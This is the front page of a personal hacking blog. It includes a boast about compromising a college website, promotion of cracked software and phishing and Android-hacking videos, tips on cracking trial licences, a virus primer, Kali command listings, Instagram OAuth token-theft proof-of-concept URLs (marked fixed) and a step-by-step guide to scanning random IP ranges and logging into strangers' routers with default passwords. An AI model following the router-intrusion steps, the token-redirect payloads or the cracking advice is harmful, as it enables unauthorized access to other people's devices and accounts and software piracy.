Search

Cyber Security

Cybersecurity is the body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access. In a computing context, security includes both cybersecurity and physical security | vishal waghmare

Author

realvilu

Website Pen Testing Demo | Its Secure NOW | Villu

————————————————————————————————————
THIS WEBSITE IS MIGRATED TO OTHER SERVER.AND DATABASE ALSO CHANGE.!

SO DONT WORRY!!!!!!

———————————————————————————————————–
WEBSITE IS WELL AND SECURE!!!

DECLAMATION

I would like to show you that how dangerous it can be for your website if anybody inclusion into your web server , that person can totally manipulate your precious database ,which you made or create by hard work.

friends i wanna to say you that if in future you need to make a beautiful website for yours business or any personal work ,then be sure it is secure or not. if not then please do it first .

Don’t give time to sine external beauty..! if your internal structure is weak .anybody can attack on you…! it may your usually life or your business or anything may be its is …..!

so first sure that you are secure …!!!

———————————————————————————————————–
Now website is in well condition becouse of good and presence of mind staff .working hard and give best effort for collage ..which i didn’t seen anywhere .

I appreciate to my collage staff and to principal sir,
my new principal sir working hard for collage ,that potantial i never seen ever .so i wana to say same word for my respecting principal sir: “Nobody can stop you, whether you have potential to do better .no one can loss you that we know you have a great strength.”

——————————————————————————————————-
CONTACT ME :
FACEBOOK http://facbook.com/realvilu
TWITTER http://twitter.com/thevishalboss
REDDIT http://reddit.com/realvilu
INSTA http://instagram.com/realvilu

http://www.leetvilu.blogspot.in
http://www.cybersecuritynode.wordpress.com

———————————————————————————————————-
CONTACT ME IF ANY SECURITY ISSUE:
WE ARE WORKING AS TROUBLESHOOTING OR PEN TESTING

SEARCH ME ON JUSTDAIL CYBERCELL NASHIK

———————————————————————————————————–
Continue reading “Website Pen Testing Demo | Its Secure NOW | Villu”

Featured post

IDM (Internet Download Manager) | 6.25 Full Cracked for Free |2016| villu

IDM (Internet Download Manager) | 6.25 Full Cracked for Free |2016| villu

—————————————————————————————————- IDM (Internet Download Manager) | 6.25 Full Cracked for Free |2016| villu
———————————————————————————————-

visit for more deatail: https://leetvilu.blogspot.in

check —

✯how to make youtube intro video✯
https://www.youtube.com/watch?v=5z83d…

✯how to protect CCTV | ✯
https://www.youtube.com/watch?v=jMssD…

✯FACEBOOK PHISH!NG | SHADOWAVE | LATEST 2017 WORKING : https://www.youtube.com/watch?v=CMlB8…

✯WEBSITE HACK BY NOREDIRECT | 2017 | FIREFOX ADDON
https://www.youtube.com/watch?v=XLPmn…

✯BLIND INJECTION | WEBSITE ADDMIN PANEL BYPASS | CONTROL PANEL BYPASS | 2017
https://www.youtube.com/watch?v=Xl6Fk…

✯PureVPN crack Unlimited Trial activation method for Life Trial Reset✯Free VPN
https://www.youtube.com/watch?v=9HWvh…

✯HACK ANDROID | REMOTE ACCESS ANDROID | CAMERA HACK ANDROID | PHOTO | CONTACT HACK
https://www.youtube.com/watch?v=_nl5t…

✯NOD32 ANTIVIRUS | LICENCE KEY | SERIAL KEY 2017
https://www.youtube.com/watch?v=ivVJ_…

✯FACEBOOK PASSWORD CRACKER | TOOL | BRUETFORCE | HACK | AND SECURITY | 2018 | LATEST
https://www.youtube.com/watch?v=6Yl16…

✯5 ALIEN ATTACK | 2017✯
https://www.youtube.com/watch?v=2Gjln…

✯ALiEN SHIP ON EARTH | 2017✯
https://www.youtube.com/watch?v=bPuId…

✯————————————————————————————————✯
CONTACT ME:
WWW.FACEBOOK.COM/REALVILU
WWW.TWITTER.COM/THEVISHALBOSS
WHATASPP +919764361472
✯———————————————————————————————–✯

ttps://www.youtube.com/channel/UC-e79jeVWHF9E49bEJztpfQ

Reverse Engineering

                                  Reverse Engineering

Reverse-engineering is especially important with computer hardware and software. Programs are written in a language, say C++ or Java, that’s understandable by other programmers. But to run on a computer, they have to be translated by another program, called a compiler, into the ones and zeros of machine language. Compiled code is incomprehensible to most programmers, but there are ways to convert machine code back to a more human-friendly format, including a software tool called a decompiler.

Reverse-engineering is used for many purposes: as a learning tool; as a way to make new, compatible products that are cheaper than what’s currently on the market; for making software interoperate more effectively or to bridge data between different operating systems or databases; and to uncover the undocumented features of commercial products. 

Reverse-engineering can also expose security flaws and questionable privacy practice

With the help of Reverse Engineering we can modify a software at own way… Like we can change the name of Software, We can editing a software, We can convert Trial Software to License software… n many more. 
So Reverse Engineering is a hacker friendly tool…. Use it n Enjoy..!!



Tools >>

CrowdRE – Crowdsourced Reverse Engineering:
The CrowdRE project aims to fill this gap. Rather than using a live distribution of changes to all clients, which has proven to fail in the past, it leverages from the architecture that is being used with success to organize source code repositories: a system that manages a history of changesets as commit messages.The CrowdRE client is now freely available as an IDA Pro plugin. CrowdStrike maintains a central cloud for the community to share their commits amongst each other. This basic concept is sufficient for a collaborative workflow on a per-function basis for a shared binary. One exciting feature is a similarity hashing scheme that considers the basic block boundaries of a function. Each function is mapped on a similarity preserving hash of fixed size.
https://crowdre.crowdstrike.com/sign-in


OLLYDBG TOOL: Version 2.01 alpha 2 
This tool is mostly used for REVERSE ENGINEERING.
We can make a own license key with the help of it, Any trial version will be a crack from this tool OLLYDBG. The most important novelty is that this version is compatible with Windows 7. I have tested it under Win7 Home Premium 32-bit. 

http://www.ollydbg.de/odbg201b.zip



HEX WORKSHOP TOOL:

The Hex Workshop Hex Editor is a set of hexadecimal development tools for
Microsoft Windows, combining advanced binary editing with the ease and flexibility
of a word processor. With Hex Workshop you can edit, cut, copy, paste, insert, and delete hex, print customizable hex dumps, and export to RTF or HTML for publishing. Additionally you can goto, find, replace, compare, calculate checksums, add smart bookmarks, color map, and generate character distributions within a sector or file. Hex Workshop supports drag and drop and is integrated with the Windows operating system so you can quickly and easily hex edit from your most frequently used workspaces. The Data Inspector is perfect for interpreting, viewing, and editing decimal and binary values. Arithmetic, logical, ascii case, and bitwise operations can be used to help manipulation your data in place.
An Intergrated Structure Viewer allows you to view and edit data in the most intuitive and convenient way.The structure viewer supports nested structures, references to other structures, along with many atomic data types: char, byte, ubyte, word, uword, long, ulong, longlong, float, double, OLE Date/Time, DOSTIME, DOSDATE, FILETIME, and time_t.

Download Link: HexWorkshop Tool

Videos Of Reverse Engineering Toolsssss..!!

CrowdRE – Crowdsourced Reverse Engineering:


OllyDBG Tool Tutorial:

OllyDBG Tutorial


HexWorkshop Tool Tutorial:

Hex Editor Tutorial

To Create Your Own Social Network Website

JCOW:



Top 10 reasons to choose Jcow
1
Handle more traffic – Clean codes and Dynamic caching can lower the CPU load and 
speed up your website.
2
Make your site more interactive – Well designed Jcow applications help you members to connect and communicate with others more effectively.
3
Add questions to the Registration Form – You can add new member fields, which will be displayed to the registration form, profile form, and the member browsing form.
4
Easily share stuff – Within the AJAX sharing Box, your members can publish status,
photos, videos, and blogs.
5
Customize and Extend your Jcow Network – A Jcow network consists of core apps(like “Friends” and “Messages”) and optional apps(like “Blogs” and “”Videos”). You can enable/disable optional apps. You can also develop your own apps.
6
Every profile could be Unique – Members can customize their own profile theme and 
add music player to the page.
7
Members know what’s happening to them – Profile was commented, photo was
commented, forum post was replied, comment was replied,… The “Notifications” 
tell everything to the member.
8
The power of “Following” – The Twitter’s success tells us that people like to know the
updates from those they are interested in.
9
Give permissions the way you want – Jcow permissions depend on “Member Roles”.
You can edit roles and give a member multiple roles. This logic enables you to members 
more easily.
10
Make money from your Network – With the Ads management, you can easily insert ads 
codes like Google Adsense. You can also let Jcow hide the ad to specified member roles. 

Latest version: 5.2.1
Download | Demo

Admin Panel Demo

Please download Free version and install to your own server. 

For More Information 
www.jcow.net

Virus Types

What is a Computer Virus ?A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
Virus – A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.
Types of viruses :-
The different types of viruses are as follows-
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.


Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :-Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :-A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :-These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :-
Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it’s presense.

6) Macro Viruses :- A macro virus is a computer virus that “infects” a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.


Malware – Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.
This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and these won’t be covered under this tutorial.
Before we continue it is important to understand the generic malware terms that you will be reading about.
Backdoor A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.
Hijackers– A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker’s own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.
Spyware– A program that monitors your activity or information on your computer and sends that information to a remote computer without your Knowledge.
Adware– A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware.
There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.
Dialler – A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.
Trojan– A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.
Worm– A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.

Hack Instagram Account

Hack Instagram Account



Nir Goldshlager Founder of Break Security find the critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim’s photos, edit comment and post new photos.
1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)


He reported a few issues to Instagram Include OAuth Attacks, But the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar, Then Facebook Security send me a message, They say even that they was unable to fix this issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,

So, first, checked Instagram’s OAuth protocol: (http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.


In addition, redirection was only allowed to go to the owner app domain. 
Thus, hacker needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.


Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Game Over.

Bug 2.

With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.


Instagram Would like to access your public profile and friend list

Nir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token

Malware Analysis

ODA Online DisAssembler

ODA stands for Online DisAssembler. ODA is a general purpose machine code disassembler that supports a myriad of machine architectures.
Built on the shoulders of libbfd and libopcodes (part of binutils), ODA allows you to explore an executable by dissecting its sections,
strings, symbols, raw hex, and machine level instructions.

ODA is an online Web Based Disassembler for when you don’t have time or space for a thick client.
ODA is a BETA release that is limited by the resource constraints of the server on which it is hosted and the spare time of its creators

Features:
  • Malware analysis
  • Vulnerability research
  • Visualizing the control flow of a group of instructions
  • Disassembling a few bytes of an exception handler that is going off into the weeds
  • Reversing the first few bytes of a Master Boot Record (MBR) that may be corrupt
  • Debugging an embedded systems device driver

Online DisAssembler


+vishal villu 
+Vic Gundotra 
+Amit Agarwal 
+Hacer SAYINER 

Kali Linux Tutorials camands

Kali Linux Tutorials

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd.
Kali Linux is preinstalled with over 600 penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits.

A-Z KALI LINUX COMMANDS
a
apropos : Search Help manual pages (man -k)
apt-get : Search for and install software packages (Debian)
aptitude : Search for and install software packages (Debian)
aspell : Spell Checker
awk Find and Replace text, database sort/validate/index
b
basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)
c
cal Display a calendar
case Conditionally perform a command
cat Concatenate and print (display) the content of files
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command – ignoring shell functions
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts
d
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls’
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage
e
echo Display message on screen
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions
f
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file
g
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groupadd Add a user security group
groupdel Delete a group
groupmod Modify a group
groups Print group names a user is in
gzip Compress or decompress named file(s)
h
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command
history Command History
hostname Print or set system name

i
iconv Convert the character set of a file
id Print user and group id’s
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
j
jobs List active jobs
join Join lines on a common field
k
kill Stop a process from running
killall Kill processes by name

l
less Display output one screen at a time
let Perform arithmetic on shell variables
ln Create a symbolic link to a file
local Create variables
locate Find files
logname Print current login name
logout Exit a login shell
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files
m
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mtr Network diagnostics (traceroute/ping)
mv Move or rename files or directories
mmv Mass Move and rename (files)
n
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
notify-send Send desktop notifications
nslookup Query Internet name servers interactively

o
open Open a file in its default application
op Operator access
p
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory
q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
r
ram ram disk device
rcp Copy files between two machines
read Read a line from standard input
readarray Read from stdin into an array variable
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
s
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.’
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
suspend Suspend execution of this shell
symlink Make a new name for a file
sync Synchronize data on disk with memory
t
tail Output the last part of file
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command
u
ulimit Limit user resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
uptime Show uptime
useradd Create new user account
userdel Delete a user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
v
v Verbosely list directory contents (`ls -l -b’)
vdir Verbosely list directory contents (`ls -l -b’)
vi Text Editor
vmstat Report virtual memory statistics
w
wait Wait for a process to complete
watch: Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user’s $path, man pages and source files for a program
which Search the user’s $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un’)
wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user
x
xargs Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in the user’s preferred application.
yes Print a string until interrupted
Amap The first next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal.
It also identifies non-ascii based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.
root@kali:~# amap -bqv 192.168.1.15 80
Using trigger file /etc/amap/appdefs.trig … loaded 30 triggers
Using response file /etc/amap/appdefs.resp … loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc … loaded 450 triggers
amap v5.4 (www.thc.org/thc-amap) started at 2014-05-13 19:07:16 – APPLICATION MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http – banner: \n\n501 Method Not Implemented\n\n

Method Not Implemented

\n

to /index.html not supported.
\n

\n


\n

Apache/2.2.22 (Debian) Server at 12
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http-apache-2 – banner: \n\n501 Method Not Implemented\n\n

Method Not Implemented

\n

to /index.html not supported.
\n

\n


\n

Apache/2.2.22 (Debian) Server at 12
Waiting for timeout on 19 connections …

amap v5.4 finished at 2014-05-13 19:07:22

Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.
root@kali:~# cat /opt/Teeth/README.txt
NB NB: This runs on Kali Linux
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#Make directory /opt/Teeth/
#Copy tgz to /opt/Teeth/
#Untar

Load the config file called /opt/Teeth/etc/Maltego_config.mtz file into Maltego.
This is painless:
1) Open Maltego Tungsten (or Radium)
2) Click top left globe/sphere (Application button)
3) Import -> Import configuration, choose /opt/Teeth/etc/Maltego_config.mtz

Notes
—–
Config file is in /opt/Teeth/etc/TeethConfig.txt
Everything can be set in the config file.

Log file is /var/log/Teeth.log, tail -f it while you running transforms for
real time logs of what’s happening.

You can set DEBUG/INFO. DEBUG is useful for seeing progress – set in
/opt/Teeth/units/TeethLib.py line 26

Look in cache/ directory. Here you find caches of:
1) Nmap results
2) Mirrors
3) SQLMAP results

You need to remove cache files by hand if you no longer want them.
You can run housekeep/clear_cache.sh but it removes EVERYTHING.

The WP brute transform uses Metasploit.Start Metasploit server so:
msfconsole -r /opt/Teeth/static/Teeth-MSF.rc
It takes a while to start, so be patient.

In /housekeep is killswitch.sh – it’s the same as killall python.

Crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.
With the STK and LTK, all communications between the master and the slave can be decrypted.

root@kali:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap

!!!
TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)
!!!

Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3

Note: Coming Soon more Tutorials and Tricks

How to Randomly Hack a Home Routers

In this tutorial “How to Randomly Hack a Home Routers”, we are going to show you how to use port scanner to identify home routers (and even office routers :p) and after that we will try to log in to those routers.

In the world most of users doesn’t change there router’s default password because most of them only know how to use without know how to configure the router itself. So that’s the point. We can use that vulnerability to hack the routers.
Requirements:

  • Port Scanner (I use zenmap in this tutorial)
  • Web Browser (I use Google Chrome)
  • Internet Connection

First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap.
How to Randomly Hack a Home Routers

Step by Step How to Randomly Hack a Home Routers

1. We should select an IP range. I have selected IP range that includes my public IP address.
XXX.XXX.30.0-XXX.XXX.30.255
2. Now let’s scan for home routers.

When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).
I have found many IP addesses with port 80 is opened.
How to Randomly Hack a Home Routers
So I stopped my scan.
3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page.
How to Randomly Hack a Home Routers
4. If you see the alert error messages, it says TD-8817. So we can Google for it
search “TD-8817 default username and password
How to Randomly Hack a Home Routers
5. Now let’s try to access these IP addresses using default logins we just got on step 4.
Default username and passwords are not same for every routers.
With username : admin and password : admin, we can log in to the router administration page
How to Randomly Hack a Home Routers
Attacker can do several harmful things when they can access router page, such as:

  • Redirecting DNS to malicious websites
  • Phishing Attacks
  • etc

Conclusion:
Because most of users doesn’t change their router passwords. It’s a very bad habit because hackers can access your router form anyplace through internet when you are online and It is very harmful to you. So you must change your home router’s password. Keep it on you mind.

Blog at WordPress.com.

Up ↑